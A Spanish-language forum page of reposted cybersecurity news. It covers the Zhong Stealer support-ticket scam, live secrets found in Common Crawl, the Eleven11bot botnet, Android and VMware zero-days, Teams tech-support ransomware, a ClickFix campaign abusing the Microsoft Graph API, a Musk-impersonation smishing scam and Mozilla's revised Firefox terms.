Echemos un vistazo más de cerca a cómo opera este malware.

Cómo funciona Zhong Stealer

Los cibercriminales detrás de Zhong Stealer no se basan en exploits complejos ni en herramientas de piratería de alta tecnología para entrar en las empresas. En cambio, utilizan una estafa que requiere poco esfuerzo, pero es muy eficaz y que se aprovecha de la naturaleza humana: urgencia, confusión y frustración.

Como señalaron los investigadores de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, el ataque se desarrolla según un patrón calculado y repetitivo diseñado para desgastar a los agentes de atención al cliente:

Aparece un nuevo ticket de soporte, pero la cuenta del remitente es nueva y está completamente vacía. No hay historial, ni interacciones pasadas, solo una vaga solicitud de ayuda.

El atacante escribe en un idioma que no funciona, generalmente en chino, lo que dificulta seguir la conversación. Esto agrega un elemento de confusión y hace que la solicitud parezca más urgente.

Se adjunta un archivo ZIP, que supuestamente contiene capturas de pantalla u otros detalles necesarios para la solicitud. El atacante insiste en que el agente de soporte debe abrirlo para comprender el problema.

Si el agente duda, el atacante se frustra cada vez más y lo presiona para que actúe.

Archivos ZIP sospechosos con caracteres chinos

La ejecución de Zhong Stealer en un entorno seguro y aislado, como el sandbox de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, reveló su comportamiento casi de inmediato.

Archivo malicioso analizado dentro del sandbox You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Después de ejecutar el análisis, podemos ver en la esquina superior derecha de la pantalla que el sandbox You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login marcó inmediatamente el archivo y sus actividades como maliciosos, resaltándolos en rojo.

Esto permite a los equipos de seguridad reconocer amenazas al instante sin necesidad de conocimientos técnicos profundos: la forma más rápida y sencilla de determinar si un archivo o enlace sospechoso contiene malware.

Actividad maliciosa detectada por el sandbox You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Durante la sesión de análisis, también podemos ver cómo Zhong Stealer descarga componentes adicionales para continuar el ataque:

Zhong Stealer descarga componentes adicionales dentro del sandbox You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Después de todos los preparativos, Zhong Stealer comienza con el robo de credenciales y la exfiltración de datos. Al hacer clic en el comportamiento malicioso dentro del sandbox de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, podemos ver todas las técnicas y tácticas principales utilizadas por Zhong Stealer.

Análisis detallado del comportamiento malicioso dentro del sandbox de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

A partir de este análisis, podemos ver cómo Zhong Stealer mantiene su persistencia en un sistema infectado. Su método principal es agregar una clave de registro para asegurarse de que el malware se ejecute automáticamente cada vez que se inicia el sistema.

Si se elimina la entrada de registro, Zhong tiene un plan de respaldo: utiliza una tarea programada para reiniciarse, lo que dificulta su eliminación total.

Descubren mecanismo de persistencia en un entorno seguro

Una vez que se asegura la persistencia, Zhong cambia su enfoque al objetivo real: recolectar credenciales y datos de extensiones del navegador.

Al apuntar a la información de inicio de sesión almacenada, puede robar datos comerciales y personales confidenciales antes de que la víctima se dé cuenta de que han sido comprometidos.

Zhong Stealer comienza a escanear Edge para robar datos confidenciales

Finalmente, después de robar datos confidenciales, Zhong se conecta a su servidor de comando y control (C2) en Hong Kong para enviar la información robada a los atacantes.

Fuente:
HackRead
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#912

Noticias Informáticas / Los datos de entrenamiento de DeepSeek contienen 12 000 credenciales activas

Marzo 04, 2025, 10:58:30 PM

Los investigadores de seguridad han analizado un conjunto de datos masivo utilizado para entrenar a DeepSeek y otros modelos de IA y han encontrado casi 12.000 credenciales secretas activas, lo que expone sus respectivos servicios.

Los secretos "activos" se refieren a claves API, contraseñas y otras credenciales que se autentican correctamente con sus respectivos servicios.

Truffle Security, una empresa de software de seguridad de código abierto, dijo que encontró la asombrosa cantidad de 11.908 secretos activos en el archivo Common Crawl. Este conjunto de datos de 400 terabytes contiene instantáneas de sitios web de 47,5 millones de hosts en 38,3 millones de dominios registrados y representa una amplia muestra representativa de Internet.

Se encontraron secretos activos en casi tres millones de sitios web, lo que significa que muchos sitios web reutilizan los mismos secretos.

"En un caso extremo, una sola clave API de WalkScore apareció 57.029 veces en 1.871 subdominios", dijo Truffle Security en un informe.

La empresa explica que los desarrolladores exponen secretos al codificarlos en el HTML y Javascript del front-end en páginas web que no controlan. No es culpa de las organizaciones ni de los rastreadores, a quienes no se les debería encomendar la tarea de redactar los datos de rastreo utilizados por los investigadores.

Sin embargo, cuando estos datos son ingeridos por los grandes modelos de lenguaje (LLM), la exposición "probablemente contribuye a que los LLM sugieran secretos codificados".

Los investigadores también destacaron los riesgos de que los modelos de IA entrenados en código inseguro puedan reproducir prácticas inseguras. Por ejemplo, pueden sugerir la codificación de credenciales, poniendo en riesgo a las organizaciones.

"Los LLM populares, incluido DeepSeek, se entrenan en Common Crawl, un conjunto de datos masivo que contiene instantáneas de sitios web. Dada nuestra experiencia al encontrar secretos expuestos en Internet pública, sospechamos que las credenciales codificadas podrían estar presentes en los datos de entrenamiento, lo que podría influir en el comportamiento del modelo", dijeron los investigadores.

Los resultados del modelo se moldean aún más mediante otros conjuntos de datos de entrenamiento, ajustes, técnicas de alineación y contexto de aviso.

La empresa probó previamente 10 LLM y demostró que la mayoría recomienda codificar de forma rígida las claves API y las contraseñas, incluidas herramientas para desarrolladores como VS Code, ChatGPT y otros asistentes de codificación de IA ampliamente utilizados.

"¿El riesgo real? Los programadores inexpertos (y no) podrían seguir este consejo ciegamente, sin darse cuenta de que están introduciendo fallas de seguridad importantes", explicaron los investigadores.

Truffle Security dijo que se comunicaron con los proveedores cuyos usuarios se vieron más afectados por los secretos expuestos y trabajaron con ellos para revocar las claves activas, lo que ayudó a rotar "varios miles de claves".

Entre los 219 tipos distintivos de secretos descubiertos, la filtración más frecuente fueron las claves API de MailChimp, que los atacantes pueden explotar en campañas de phishing, exfiltración de datos y suplantación de marca. Algunos sitios web expusieron claves raíz de AWS y una página web incluía 17 webhooks de Slack activos.

Los investigadores sugieren que los desarrolladores incluyan reglas estrictas en sus mensajes de IA para no sugerir nunca credenciales codificadas ni otros patrones de código inseguros. Los desarrolladores también deberían escanear su código y sitios web públicos en busca de claves expuestas.

Fuente:
CyberNews
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#913

Noticias Informáticas / La botnet Eleven11bot es casi tres veces más grande que estimaciones iniciales

Marzo 04, 2025, 10:55:58 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Las cámaras de seguridad, las grabadoras de vídeo en red y otros dispositivos IoT forman parte de una botnet global recién descubierta que ataca a las telecomunicaciones y los foros en línea.

La Fundación ShadowServer rastrea la botnet Eleven11bot, que fue descubierta por el Equipo de Respuesta a Emergencias (ERT) de Nokia Deepfield el 26 de febrero de 2025. La botnet ya ha infectado 86.400 dispositivos en todo el mundo.

Al 2 de marzo, la mayoría de los dispositivos comprometidos se encuentran en los EE. UU. (casi 25.000), y el Reino Unido ocupa el segundo lugar con casi 11.000 dispositivos infectados.

Eleven11bot, compuesto principalmente por cámaras web y grabadoras de vídeo en red (NVR) comprometidas, ha participado en ataques distribuidos de denegación de servicio (DDoS).

ERT estimó anteriormente que el tamaño de la botnet era de alrededor de 30.000 dispositivos. Incluso entonces, los investigadores dijeron que el tamaño "es excepcional entre las botnets de actores no estatales, lo que la convierte en una de las campañas de botnets DDoS más grandes conocidas observadas desde la invasión de Ucrania en febrero de 2022".

"Eleven11bot se ha dirigido a diversos sectores, incluidos los proveedores de servicios de comunicaciones y la infraestructura de alojamiento de juegos, aprovechando una variedad de vectores de ataque. La intensidad de los ataques ha variado ampliamente, desde unos pocos cientos de miles hasta varios cientos de millones de paquetes por segundo", dijo ERT anteriormente.

Según se informa, algunos ataques contra foros públicos duraron varios días y siguen en curso.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Eleven11bot es capaz de lanzar ataques DDoS volumétricos masivos que superan los cientos de millones de paquetes por segundo a través de ciertos vectores.

Un análisis más profundo de algunas de las direcciones IP que participan en la botnet reveló que el 96% de ellas no eran suplantables y se originaron en dispositivos accesibles genuinos, informa GreyNoise.

Los investigadores advierten que los operadores de botnets apuntan a dispositivos IoT explotando contraseñas débiles y predeterminadas, fuerza bruta y apuntando a marcas específicas de cámaras de seguridad, como VStarcam. Los atacantes escanean en busca de puertos Telnet y SSH expuestos, que a menudo quedan desprotegidos en el hardware IoT.

GreyNoise recomienda a los defensores de la red bloquear el tráfico de IP maliciosas conocidas y monitorear los registros de la red para detectar intentos de inicio de sesión inusuales.

Eleven11bot recibe su nombre por los distintivos banners hexadecimales, como \`head\[...\]1111\` o \`head\[...\]11111111\`, que identifican a los bots en el puerto TCP 17000.

Fuente:
CyberNews
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#914

Noticias Informáticas / Microsoft actualiza el soporte de CPU de Windows 11 para sistemas OEM

Marzo 04, 2025, 10:52:02 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Microsoft actualizó su documento de soporte a mediados de febrero de 2025 para incluir los procesadores Intel compatibles con Windows 11 24H2, incluidos varios procesadores Intel de octava, novena y décima generación excluidos.

Las CPU Intel mencionadas anteriormente se lanzaron hace unos ocho años; sin embargo, muchas de ellas siguen funcionando bien hasta el día de hoy y son compatibles con Windows 11 siempre que sus placas base tengan el requisito TPM 2.0. La empresa afirmó que estos modelos de procesadores cumplen con los requisitos mínimos del sistema para Windows 11. Aparte de eso, también afirmó:

"Las generaciones posteriores y futuras de procesadores que cumplan con los mismos principios se considerarán compatibles, incluso si no se enumeran explícitamente".

Tenga en cuenta que la lista de procesadores Intel compatibles con Windows 11 versión 24H2 está diseñada para los fabricantes de equipos originales que construyen nuevos dispositivos con Windows 11, no para el consumidor medio que utiliza una PC con Windows 11. Por lo tanto, aunque Microsoft no haya restablecido las tres generaciones de Intel en su lista, eso no significa que su sistema se bloqueará o dejará de recibir actualizaciones del sistema. Todo lo que la compañía está diciendo es que los fabricantes ya no deberían usar estos procesadores antiguos para los nuevos sistemas y deberían instalar Windows 11 en ellos.

Sin embargo, Microsoft aún no ha publicado una lista oficial de CPU compatibles para ensambladores de PC no OEM o personalizados. Por lo tanto, si está armando su propia PC con Windows 11 a partir de piezas usadas, su única guía son los Requisitos del sistema de Windows 11 de Microsoft, que requieren una CPU de 1 GHz o más rápida con dos o más núcleos. Sin embargo, también lo dirige a la misma página a la que se refieren los OEM cuando arman una nueva PC para obtener su lista de CPU aprobadas, por lo que probablemente significa que también está limitado a chips Intel de octava generación o más nuevos.

A pesar de limitar su último sistema operativo a estos procesadores, aún puede instalar Windows 11 en hardware no compatible modificando algunos valores del registro. Es posible que no obtenga actualizaciones del sistema y de seguridad, por lo que tendrás que hacerlo bajo su propio riesgo. Alternativamente, puede seguir usando Windows 10, pero debe desembolsar $30 al año para actualizaciones de seguridad continuas que te mantengan a salvo de los riesgos en línea en constante evolución.

Fuente:
Tom´s Hardware
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#915

Noticias Informáticas / Estafador que se hace pasar por Elon Musk premia a un "afortunado usuario"

Marzo 04, 2025, 10:48:07 PM

Para celebrar la caída de DOGECoin, Elon Musk, en asociación con Donald Trump, está regalando a los usuarios afortunados 50 Bitcoin (3,7 millones de dólares). Bueno, esto no es cierto, ya que es simplemente una estafa para defraudar a las víctimas desafortunadas.

"¡Oh, hombre, estoy tan feliz de que Elon me haya contactado directamente con una oferta tan increíble! ¡Por fin puedo jubilarme!", dijo un usuario de Facebook después de ser contactado por alguien que se hizo pasar por Elon Musk.

Roberto Bertini Renzetti recibió un mensaje de texto a las 11:43 a.m. en el que se le decía que había sido seleccionado al azar para recibir 50 BTC, lo que se traduce en aproximadamente 3,7 millones de dólares estadounidenses, una cantidad de dinero que cambia la vida de algunos.

El mensaje decía que Renzetti había recibido estos fondos "en celebración del lanzamiento de DOGECoin", una moneda meme supuestamente vinculada al Departamento de Eficiencia Gubernamental, que dirige Musk.

El remitente afirma que esta DOGECoin está "respaldada en asociación con el presidente [Donald Trump] y el equipo SpaceX de Elon Musk".

Renezetti solo necesita contactar a Elon Musk directamente a través de un correo electrónico que escribe mal el nombre de la empresa de Musk (Tesa en lugar de Tesla).

El mensaje termina: "Saludos cordiales y buena suerte. Elon Musk y equipo".

Es increíblemente descabellado pensar que Musk contactó directamente a Renzetti y le otorgó millones de dólares, y los usuarios detectan las señales de alerta inmediatamente.

En primer lugar, los comentaristas notaron el error ortográfico de Tesla en la dirección de correo electrónico, lo que suele ser una señal de que la dirección es ilegítima.

Este mensaje es claramente una estafa de "smishing" (phishing por SMS), un tipo de fraude en el que los estafadores se hacen pasar por una organización o un individuo conocido (como Elon Musk) para extraer información confidencial de la víctima.

Si Renezetti hubiera sido imprudente con este esquema y hubiera hecho clic en el enlace a la dirección de correo electrónico falsa de Tesla, el estafador probablemente le habría pedido a la víctima la dirección de su billetera de criptomonedas o las claves de la billetera para "completar" la transacción.

Los estafadores probablemente usarían esta información para vaciar las billeteras de criptomonedas de la persona.

Como mencionó un usuario de Facebook:

"Parece legítimo. No hay razón para no darles las claves de tu billetera", dijo sarcásticamente.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Alternativamente, al hacer clic en el enlace, la víctima es transferida a un sitio web malicioso donde se roba su información personal, como es común en las estafas de smishing.

Fuente:
CyberNews
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#916

Noticias Informáticas / Google corrige vulnerabilidad de día cero en Android

Marzo 04, 2025, 03:46:43 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Google ha publicado parches para 43 vulnerabilidades en la actualización de seguridad de Android de marzo de 2025, incluidas dos vulnerabilidades de día cero explotadas en ataques dirigidos.

Las autoridades serbias han utilizado una de las vulnerabilidades de día cero, una vulnerabilidad de seguridad de divulgación de información de alta gravedad ( CVE-2024-50302 ) en el controlador del núcleo de Linux para dispositivos de interfaz humana, para desbloquear dispositivos confiscados.

Según se informa, la falla fue explotada como parte de una cadena de exploits de día cero de Android desarrollada por la empresa israelí de análisis forense digital Cellebrite para desbloquear dispositivos confiscados.

La cadena de exploits, que también incluye una vulnerabilidad de día cero de clase de video USB ( CVE-2024-53104 ) parcheada el mes pasado y una vulnerabilidad de día cero de controlador de sonido USB ALSA), fue encontrada por el Laboratorio de Seguridad de Amnistía Internacional a mediados de 2024 mientras analizaba los registros encontrados en un dispositivo desbloqueado por las autoridades serbias.

La semana pasada, Google declaró que habían compartido correcciones para estas fallas con sus socios OEM en enero.

"Sabíamos de estas vulnerabilidades y del riesgo de explotación antes de estos informes y desarrollamos rápidamente correcciones para Android. Las correcciones se compartieron con los socios OEM en un aviso para socios el 18 de enero", dijo un portavoz de Google.

El segundo día cero corregido este mes ( CVE-2024-43093 ) es una vulnerabilidad de escalada de privilegios del marco de Android que permite a los atacantes locales acceder a directorios confidenciales debido a una normalización de Unicode incorrecta al explotar una omisión del filtro de ruta de archivo sin privilegios de ejecución adicionales o interacción del usuario.

Las actualizaciones de seguridad de Android de este mes también abordan 11 vulnerabilidades que pueden permitir a los atacantes obtener ejecución remota de código en dispositivos vulnerables.

Google ha publicado dos conjuntos de parches de seguridad, los niveles de parche de seguridad 2025-03-01 y 2025-03-01. El último viene con todas las correcciones del primer lote y parches para subcomponentes de kernel y de terceros de código cerrado, que pueden no aplicarse a todos los dispositivos Android.

Los dispositivos Google Pixel reciben las actualizaciones de inmediato, mientras que otros proveedores a menudo tardan más en probar y ajustar los parches de seguridad para sus configuraciones de hardware.

Los fabricantes también pueden priorizar el conjunto de parches anterior para actualizaciones más rápidas, lo que no necesariamente indica un mayor riesgo de explotación.

En noviembre, la compañía parcheó otro día cero de Android ( CVE-2024-43047 ), que fue etiquetado por primera vez como explotado por Google Project Zero en octubre de 2024 y utilizado por el gobierno serbio en ataques de software espía NoviSpy dirigidos a dispositivos Android de activistas, periodistas y manifestantes.

Fuente:
BleepingComputer
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#917

Noticias Informáticas / Broadcom corrige tres vulnerabilidades de día cero de VMware

Marzo 04, 2025, 03:43:56 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Broadcom ha advertido hoy a sus clientes sobre tres vulnerabilidades de día cero de VMware, etiquetadas como explotadas en ataques y reportadas por el Centro de Inteligencia de Amenazas de Microsoft.

Las vulnerabilidades ( CVE-2025-22224, CVE-2025-22225 y CVE-2025-22226 ) afectan a los productos VMware ESX, incluidos VMware ESXi, vSphere, Workstation, Fusion, Cloud Foundation y Telco Cloud Platform.

Los atacantes con privilegios de administrador o acceso raíz pueden encadenar estas fallas para escapar del entorno protegido de la máquina virtual.

"Esta es una situación en la que un atacante que ya ha comprometido el sistema operativo invitado de una máquina virtual y ha obtenido acceso privilegiado (administrador o raíz) podría entrar en el propio hipervisor", explicó hoy la empresa. "Broadcom tiene información que sugiere que la explotación de estos problemas ha ocurrido 'en la naturaleza'".

Broadcom afirma que CVE-2025-22224 es una vulnerabilidad de desbordamiento de pila de VCMI de gravedad crítica que permite a los atacantes locales con privilegios administrativos en la máquina virtual de destino ejecutar código como el proceso VMX que se ejecuta en el host.

CVE-2025-22225 es una vulnerabilidad de escritura arbitraria de ESXi que permite que el proceso VMX active escrituras arbitrarias en el kernel, lo que lleva a un escape de la zona protegida, mientras que CVE-2025-22226 se describe como una falla de divulgación de información de HGFS que permite a los actores de amenazas con permisos de administrador filtrar memoria del proceso VMX.

Las vulnerabilidades de VMware suelen ser el objetivo de los ataques de bandas de ransomware y grupos de piratas informáticos patrocinados por el estado porque se utilizan comúnmente en operaciones empresariales para almacenar o transferir datos corporativos confidenciales.

Más recientemente, Broadcom advirtió en noviembre que los atacantes estaban explotando activamente dos vulnerabilidades de VMware vCenter Server que se parchearon en septiembre. Una permite la escalada de privilegios a la raíz ( CVE-2024-38813 ), mientras que la otra es una falla crítica de ejecución remota de código ( CVE-2024-38812 ) informada durante el concurso de piratería Matrix Cup 2024 de China.

En enero de 20204, Broadcom también reveló que los piratas informáticos estatales chinos habían explotado una vulnerabilidad crítica de vCenter Server ( CVE-2023-34048 ) como día cero desde al menos finales de 2021 para implementar puertas traseras VirtualPita y VirtualPie en hosts ESXi vulnerables.

Fuente:
BleepingComputer
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#918

Noticias Informáticas / Llamadas falsas de soporte técnico engañan a usuarios de Microsoft Teams

Marzo 03, 2025, 06:44:41 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Los investigadores de ciberseguridad de Trend Micro advierten sobre una nueva estafa en la que los cibercriminales se hacen pasar por personal de soporte técnico para obtener acceso a las computadoras de las víctimas. Pero no se trata de otro esquema de correo electrónico no deseado; los atacantes inundan las bandejas de entrada e incluso se comunican a través de Microsoft Teams para engañar a las personas para que les dejen entrar. Una vez dentro, implementan ransomware de grupos como Black Basta y Cactus.

Así es como funciona:

Las víctimas primero son bombardeadas con una avalancha de correos electrónicos. Poco después, alguien que dice ser del departamento de TI se comunica con ellas a través de Microsoft Teams o incluso una llamada telefónica. Este "ayudante" convence al usuario para que le conceda acceso remoto a su computadora, a menudo utilizando un programa legítimo llamado Quick Assist, que está integrado en Windows para permitir el soporte técnico remoto.

Una vez dentro, el estafador descarga archivos que parecen inofensivos al principio, pero se combinan y descomprimen en secreto para instalar una puerta trasera llamada BackConnect. Oculta en OneDrive, esta puerta trasera les da a los atacantes control total sobre el sistema infectado.

Según el informe técnico de Trend Micro, los incidentes recientes analizados por la empresa muestran una fuerte conexión entre este malware BackConnect y el notorio grupo de ransomware Black Basta, que supuestamente ganó más de 100 millones de dólares gracias a las víctimas en 2023. Incluso hay evidencia que sugiere que algunos miembros de Black Basta se han pasado a otra banda de ransomware llamada Cactus, ya que los métodos utilizados en los recientes ataques de Cactus son sorprendentemente similares.

Estos ataques han sido particularmente activos desde octubre de 2024, afectando principalmente a organizaciones en América del Norte, siendo Estados Unidos el que más ha sufrido. El sector manufacturero, seguido de las finanzas, la consultoría de inversiones y el sector inmobiliario, han sido objetivos frecuentes de Black Basta.

En algunos casos, después de establecer su puerta trasera, se ha visto a los atacantes utilizar métodos más avanzados para propagarse a través de una red, incluso apuntando a sistemas especializados como hosts ESXi utilizados para ejecutar máquinas virtuales. Utilizan herramientas como WinSCP para mover archivos y se les ha descubierto preparándose para cifrar archivos antes de ser detenidos. Los chats internos filtrados de Black Basta revelan que el grupo ve las herramientas de seguridad como Trend Micro como un obstáculo importante, lo que demuestra que están tratando activamente de encontrar formas de sortearlas.

Lo que hace que estos ataques sean efectivos no es necesariamente la complejidad del software utilizado, sino la forma en que los atacantes manipulan a las personas. Al mezclar la ingeniería social con el abuso de software genuino y servicios en la nube, hacen que sus acciones maliciosas parezcan una actividad informática normal. Esto pone de relieve que la ciberseguridad no se trata solo de tener el software adecuado, sino también de estar al tanto de cómo los delincuentes intentan engañar a las personas.

Fuente:
HackRead
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#919

Noticias Informáticas / Campaña de malware explota la API Graph de Microsoft para infectar Windows

Marzo 03, 2025, 06:43:03 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Una nueva campaña de ciberataque descubierta por FortiGuard Labs, la unidad de inteligencia e investigación de amenazas de Fortinet, aprovecha una combinación de ingeniería social, malware de múltiples etapas y la manipulación de servicios de nube confiables para lograr el control sobre los sistemas comprometidos.

Según la investigación de FortiGuard, la campaña se dirige a los usuarios de Microsoft Windows y tiene un alto nivel de gravedad. Su observación más crucial es que los atacantes han innovado al integrar una versión modificada del marco Havoc, Havoc Demon Agent, con la API Microsoft Graph, ocultando eficazmente sus comunicaciones maliciosas dentro del tráfico legítimo de servicios de nube conocidos.

Para su información, Havoc es un marco de comando y control de post-explotación de código abierto utilizado en ejercicios de equipos rojos y campañas de ataque para obtener el control total del sistema objetivo.

El punto de entrada inicial para este ataque es un correo electrónico de phishing cuidadosamente elaborado, que contiene un archivo adjunto HTML diseñado para engañar al destinatario para que ejecute un comando PowerShell malicioso.

Mediante una técnica conocida como "ClickFix", en la que se engaña a los usuarios para que ejecuten comandos maliciosos, el archivo adjunto presenta un mensaje de error falso, que solicita al destinatario que copie y pegue un comando aparentemente inofensivo en la terminal de su sistema. Sin embargo, este comando inicia una cadena de eventos que conduce a la descarga/ejecución de más scripts maliciosos, que se alojan estratégicamente en un sitio de SharePoint, probablemente para ocultar la operación maliciosa dentro de un entorno de nube confiable.

El script de PowerShell inicial realiza comprobaciones para evadir la detección de sandbox y luego procede a descargar/ejecutar un script de Python, también alojado en SharePoint. Este script de Python actúa como un cargador de shellcode e inyecta y ejecuta una DLL maliciosa, KaynLdr, que carga de forma reflexiva una DLL incrustada y complica aún más el análisis mediante el uso de hash de API.

El núcleo de la infraestructura C2 del atacante se basa en la versión modificada de la DLL Havoc Demon, ya que aprovecha la API de Microsoft Graph para establecer canales de comunicación que se combinan a la perfección con el tráfico legítimo de la nube. La función "SharePointC2Init" dentro de la DLL obtiene tokens de acceso para la API de Microsoft Graph y crea dos archivos dentro de la biblioteca de documentos de SharePoint de la víctima, cada uno nombrado con un identificador único derivado del sistema comprometido.

Estos archivos actúan como canales para transmitir información de la víctima y recibir comandos C2, mientras que toda la comunicación es manejada por la función modificada "TransportSend" y cifrada usando AES-256 en modo CTR. Luego, el agente analiza y ejecuta estos comandos, que incluyen una amplia gama de capacidades posteriores a la explotación, como recopilación de información, operaciones de archivos y manipulación de tokens.

El descubrimiento de FortiGuard Labs destaca la evolución de los marcos C2 de código abierto para crear nuevos ataques difíciles de detectar y la creciente necesidad de adoptar medidas de seguridad avanzadas contra dichos ataques.

"Además de mantenerse alerta ante los correos electrónicos de phishing, los mensajes guiados que alientan a abrir una terminal o PowerShell deben manejarse con especial precaución para evitar la descarga y ejecución inadvertida de comandos maliciosos", concluyeron los investigadores de FortiGuard.

Flujo del Ataque:

En un comentario, Thomas Richards, consultor principal y director de prácticas de redes y equipos rojos de Black Duck, un proveedor de seguridad de aplicaciones con sede en Burlington, Massachusetts, señaló que los piratas informáticos están utilizando servicios confiables de Microsoft para evadir la detección, lo que demuestra un alto nivel de sofisticación, pero lo que se destaca es que su método de ataque requiere más acción manual de la víctima de lo habitual.

"Estos grupos de actores maliciosos buscan la ofuscación para poder lograr sus objetivos. No es inusual verlos usar marcos de código abierto, sin embargo, el uso de servicios legítimos de Microsoft muestra un nivel de sofisticación que es preocupante. El uso de esos servicios les permite ocultarse a simple vista y tener los beneficios de ser servidores confiables", explicó Thomas. "Lo sorprendente de esto es el nivel de intervención manual necesario en la víctima para que el ataque sea un éxito. Por lo general, con estas campañas, los actores maliciosos quieren la menor interacción posible por parte de la víctima, aparte de hacer clic en un enlace".

Fuente:
HackRead
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#920

Noticias Informáticas / Mozilla modifica los términos de Firefox tras “mal entendido” por uso de datos

Marzo 03, 2025, 06:41:17 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Los nuevos Términos de uso de Firefox provocan una reacción negativa de los usuarios sobre los derechos de datos. Conozca cómo respondió Mozilla a las preocupaciones sobre el lenguaje amplio y el posible uso indebido de los datos.

En la era de Internet, donde nuestras actividades en línea dejan un rastro de datos, la confianza entre los usuarios y el software que utilizan es más importante que nunca. Esa confianza a menudo está sepultada en largos acuerdos legales y términos y condiciones complejos, pero puede desaparecer rápidamente si las personas sienten que se está violando su privacidad. Mozilla, una empresa históricamente elogiada por su compromiso con la privacidad del usuario, recientemente se encontró en el centro de una disputa de confianza de este tipo.

Lo que sucedió es que el navegador Firefox introdujo nuevos Términos de uso que, en lugar de promover la claridad, provocaron una gran controversia. La actualización, que pretendía "formalizar" los acuerdos de usuario, desencadenó una ola de reacciones negativas de los usuarios, impulsada por un lenguaje percibido como demasiado amplio y que potencialmente otorgaba a la empresa amplios derechos sobre los datos de los usuarios. A pesar de la insistencia de la empresa en que los términos tenían como objetivo aclarar las prácticas de datos existentes y formalizar los acuerdos de usuario, la redacción poco clara causó mucha confusión y rechazo.

El problema se centró en una cláusula específica que otorgaba a Mozilla una "licencia mundial, no exclusiva y libre de regalías" para utilizar la información ingresada o cargada a través de Firefox. Los críticos, incluidos representantes de empresas de navegadores rivales, interpretaron esto como un intento de reclamar la propiedad de los datos de los usuarios y potencialmente monetizarlos para fines como el desarrollo de inteligencia artificial o la publicidad dirigida. Mozilla, sin embargo, refutó estas interpretaciones, afirmando que los nuevos términos no significaban un cambio en la forma en que se manejan los datos de los usuarios.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

En respuesta a las intensas críticas, Mozilla aclaró sus intenciones y brindó más explicaciones sobre la controvertida redacción, además de revisar la cláusula para que fuera más clara. A continuación, se muestra la diferencia entre la cláusula original y la revisada:

Anterior: "Cuando carga o ingresa información a través de Firefox, por la presente nos otorga una licencia no exclusiva, libre de regalías y de alcance mundial para usar esa información para ayudarlo a navegar, experimentar e interactuar con el contenido en línea como usted indica con su uso de Firefox".

Revisada: "Usted otorga a Mozilla los derechos necesarios para operar Firefox. Esto incluye procesar sus datos como describimos en el Aviso de privacidad de Firefox. También incluye una licencia no exclusiva, libre de regalías y de alcance mundial con el propósito de hacer lo que usted solicita con el contenido que ingresa en Firefox. Esto no le otorga a Mozilla ninguna propiedad sobre ese contenido".

En declaraciones a TechCrunch, el vicepresidente de comunicaciones de la empresa, Brandon Borrman, enfatizó que la licencia era necesaria para habilitar las funcionalidades básicas del navegador, como procesar la entrada del usuario. Destacaron que los términos no les otorgaban la propiedad de los datos de los usuarios ni el derecho a usarlos más allá del alcance descrito en su Aviso de Privacidad existente.

Según la explicación de Mozilla sobre el razonamiento detrás de los términos específicos utilizados, "No exclusivo" tenía la intención de indicar que los usuarios conservan el derecho a usar sus datos de forma independiente, "Libre de regalías" reflejaba la naturaleza gratuita del navegador y "mundial" reconocía su disponibilidad global. La empresa también confirmó que los datos de los usuarios no se envían a empresas de inteligencia artificial de terceros y que cualquier dato compartido con anunciantes se desidentifica o se agrega.

La situación ha planteado preguntas fundamentales sobre la propiedad de los datos y los límites del consentimiento digital. La confusión inicial y la reacción negativa enfatizan las posibles consecuencias de términos mal redactados, incluso cuando las intenciones son benignas. Aun así, la rápida respuesta de Mozilla y las revisiones posteriores demuestran el intento de la empresa de abordar las preocupaciones de los usuarios y mantener la confianza.

Fuente:
HackRead
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Páginas 1 ... 44 45 46 47 48 ... 249